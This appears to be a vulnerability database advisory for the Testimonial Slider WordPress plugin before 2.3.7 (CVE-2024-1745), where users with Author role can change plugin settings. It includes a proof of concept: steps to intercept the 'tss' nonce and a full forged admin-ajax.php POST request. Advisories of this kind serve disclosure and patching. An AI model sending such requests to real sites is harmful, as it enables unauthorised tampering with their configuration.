Lucene search
Dmitrii IgnatyevWPEX-ID:B63BBFEB-D6F7-4C33-8824-B86D64D3F598HistoryMar 05, 2024 - 12:00 a.m.
Testimonial Slider < 2.3.7 - Author+ Settings Update
2024-03-0500:00:00
Dmitrii Ignatyev
25
testimonial slider
update
nonce interception
cookies
plugin settings
security exploit
Description The plugin does not properly ensure that a user has the necessary capabilities to edit certain sensitive plugin settings, making it possible for users with at least the Author role to edit them.
1) Go to a page where one of the sliders is already in use and intercept the nonce `tss`
2) Insert the found nonce and cookies into the request to change the plugin settings
POST /wp-admin/admin-ajax.php HTTP/2
Host: example.com
Cookie: Author+
Content-Length: 144
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=1, i
slug=updatedButShouldntBe&tss_nonce=30fd47c1fe&action=tssSettingsActionReferences
Related
nvd
nvd
CVE-2024-1745
2024-03-26 05:15:49
wpvulndb
wpvulndb
Testimonial Slider < 2.3.7 - Author+ Settings Update
2024-03-05 00:00:00
cvelist
cvelist
CVE-2024-1745 Testimonial Slider < 2.3.7 - Author+ Settings Update
2024-03-26 05:00:02
cve
cve
CVE-2024-1745
2024-03-26 05:15:49
wordfence
wordfence
9.5 High
AI Score
Confidence
High
0.0004 Low
EPSS
Percentile
9.1%
Related for WPEX-ID:B63BBFEB-D6F7-4C33-8824-B86D64D3F598